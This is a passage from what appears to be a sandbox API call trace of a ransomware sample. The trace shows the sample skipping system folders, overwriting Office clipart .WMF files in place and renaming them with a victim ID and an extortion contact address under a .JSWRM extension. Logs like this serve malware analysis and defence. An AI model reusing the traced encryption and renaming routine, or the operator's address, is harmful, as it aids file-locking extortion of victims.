[0096.093] lstrcmpiW (lpString1="SO00444_.WMF", lpString2="perflogs") returned 1 [0096.093] lstrcmpiW (lpString1="SO00444_.WMF", lpString2="documents and settings") returned 1 [0096.093] lstrcmpiW (lpString1="SO00444_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0096.093] lstrcmpiW (lpString1="SO00444_.WMF", lpString2="system volume information") returned -1 [0096.093] lstrcmpiW (lpString1="SO00444_.WMF", lpString2="msocache") returned 1 [0096.093] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0096.093] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00444_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.093] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00444_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00444_.WMF", lpUsedDefaultChar=0x0) returned 12 [0096.093] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0096.093] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0096.093] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00444_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.093] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00444_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00444_.WMF", lpUsedDefaultChar=0x0) returned 12 [0096.093] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0096.093] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0096.093] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0096.093] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0096.093] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0096.094] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0096.094] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00444_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00444_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0096.094] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=5444) returned 1 [0096.094] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.094] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1540) returned 0x205850 [0096.094] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1540, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1540, lpOverlapped=0x0) returned 1 [0096.096] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.096] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1540, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1540, lpOverlapped=0x0) returned 1 [0096.096] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0096.096] CloseHandle (hObject=0x314) returned 1 [0096.096] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0096.096] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0096.096] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0096.096] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0096.096] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0096.096] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0096.096] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0096.096] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a258 [0096.096] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0096.096] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0096.096] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0096.096] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247a88 [0096.287] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0096.287] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0096.288] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00444_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00444_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00444_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00444_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0096.291] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247a88 | out: hHeap=0x1e0000) returned 1 [0096.291] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0096.292] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0096.292] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10339e29, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10339e29, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10339e29, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x878, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO00452_.WMF", cAlternateFileName="")) returned 1 [0096.292] lstrcmpiW (lpString1="SO00452_.WMF", lpString2=".") returned 1 [0096.292] lstrcmpiW (lpString1="SO00452_.WMF", lpString2="..") returned 1 [0096.292] lstrcmpiW (lpString1="SO00452_.WMF", lpString2="...") returned 1 [0096.292] lstrcmpiW (lpString1="SO00452_.WMF", lpString2="windows") returned -1 [0096.292] lstrcmpiW (lpString1="SO00452_.WMF", lpString2="recovery") returned 1 [0096.292] lstrcmpiW (lpString1="SO00452_.WMF", lpString2="perflogs") returned 1 [0096.292] lstrcmpiW (lpString1="SO00452_.WMF", lpString2="documents and settings") returned 1 [0096.292] lstrcmpiW (lpString1="SO00452_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0096.292] lstrcmpiW (lpString1="SO00452_.WMF", lpString2="system volume information") returned -1 [0096.292] lstrcmpiW (lpString1="SO00452_.WMF", lpString2="msocache") returned 1 [0096.292] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0096.293] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00452_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.293] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00452_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00452_.WMF", lpUsedDefaultChar=0x0) returned 12 [0096.293] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0096.293] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0096.293] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00452_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.293] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00452_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00452_.WMF", lpUsedDefaultChar=0x0) returned 12 [0096.293] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0096.293] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0096.293] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0096.293] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0096.293] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0096.293] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0096.293] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00452_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00452_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0096.294] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2168) returned 1 [0096.294] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.294] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x870) returned 0x20c6c0 [0096.294] ReadFile (in: hFile=0x314, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x870, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x870, lpOverlapped=0x0) returned 1 [0096.295] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.295] WriteFile (in: hFile=0x314, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x870, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x870, lpOverlapped=0x0) returned 1 [0096.295] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20c6c0 | out: hHeap=0x1e0000) returned 1 [0096.296] CloseHandle (hObject=0x314) returned 1 [0096.296] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0096.296] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0096.296] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0096.296] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0096.296] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0096.296] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0096.296] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0096.296] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a468 [0096.296] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a468, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0096.296] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a468 | out: hHeap=0x1e0000) returned 1 [0096.296] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0096.296] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0096.296] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0096.296] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0096.296] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00452_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00452_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00452_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00452_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0096.297] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0096.297] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0096.297] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0096.297] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10339e29, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10339e29, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10339e29, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x59ec, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO00453_.WMF", cAlternateFileName="")) returned 1 [0096.297] lstrcmpiW (lpString1="SO00453_.WMF", lpString2=".") returned 1 [0096.297] lstrcmpiW (lpString1="SO00453_.WMF", lpString2="..") returned 1 [0096.297] lstrcmpiW (lpString1="SO00453_.WMF", lpString2="...") returned 1 [0096.297] lstrcmpiW (lpString1="SO00453_.WMF", lpString2="windows") returned -1 [0096.297] lstrcmpiW (lpString1="SO00453_.WMF", lpString2="recovery") returned 1 [0096.297] lstrcmpiW (lpString1="SO00453_.WMF", lpString2="perflogs") returned 1 [0096.297] lstrcmpiW (lpString1="SO00453_.WMF", lpString2="documents and settings") returned 1 [0096.297] lstrcmpiW (lpString1="SO00453_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0096.297] lstrcmpiW (lpString1="SO00453_.WMF", lpString2="system volume information") returned -1 [0096.297] lstrcmpiW (lpString1="SO00453_.WMF", lpString2="msocache") returned 1 [0096.297] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0096.297] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00453_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.297] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00453_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00453_.WMF", lpUsedDefaultChar=0x0) returned 12 [0096.297] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0096.297] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f98 [0096.297] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00453_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.297] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00453_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00453_.WMF", lpUsedDefaultChar=0x0) returned 12 [0096.297] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f98 | out: hHeap=0x1e0000) returned 1 [0096.297] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0096.297] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0096.297] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0096.298] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0096.298] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0096.298] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00453_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00453_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0096.298] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=23020) returned 1 [0096.298] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.298] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x59e0) returned 0x24d210 [0096.299] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x59e0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x59e0, lpOverlapped=0x0) returned 1 [0096.302] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.302] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x59e0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x59e0, lpOverlapped=0x0) returned 1 [0096.302] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0096.302] CloseHandle (hObject=0x314) returned 1 [0096.302] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0096.302] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0096.302] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0096.302] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0096.302] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0096.302] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0096.303] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0096.303] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0096.303] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0096.303] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0096.303] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0096.303] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0096.303] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0096.303] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0096.303] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00453_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00453_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00453_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00453_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0096.303] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0096.304] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0096.304] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0096.304] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10339e29, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10339e29, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10339e29, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xb6c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO00454_.WMF", cAlternateFileName="")) returned 1 [0096.304] lstrcmpiW (lpString1="SO00454_.WMF", lpString2=".") returned 1 [0096.304] lstrcmpiW (lpString1="SO00454_.WMF", lpString2="..") returned 1 [0096.304] lstrcmpiW (lpString1="SO00454_.WMF", lpString2="...") returned 1 [0096.304] lstrcmpiW (lpString1="SO00454_.WMF", lpString2="windows") returned -1 [0096.304] lstrcmpiW (lpString1="SO00454_.WMF", lpString2="recovery") returned 1 [0096.304] lstrcmpiW (lpString1="SO00454_.WMF", lpString2="perflogs") returned 1 [0096.304] lstrcmpiW (lpString1="SO00454_.WMF", lpString2="documents and settings") returned 1 [0096.304] lstrcmpiW (lpString1="SO00454_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0096.304] lstrcmpiW (lpString1="SO00454_.WMF", lpString2="system volume information") returned -1 [0096.304] lstrcmpiW (lpString1="SO00454_.WMF", lpString2="msocache") returned 1 [0096.304] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0096.304] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00454_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.304] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00454_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00454_.WMF", lpUsedDefaultChar=0x0) returned 12 [0096.304] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0096.304] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411f0 [0096.304] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00454_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.304] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00454_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00454_.WMF", lpUsedDefaultChar=0x0) returned 12 [0096.304] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411f0 | out: hHeap=0x1e0000) returned 1 [0096.304] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0096.304] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: 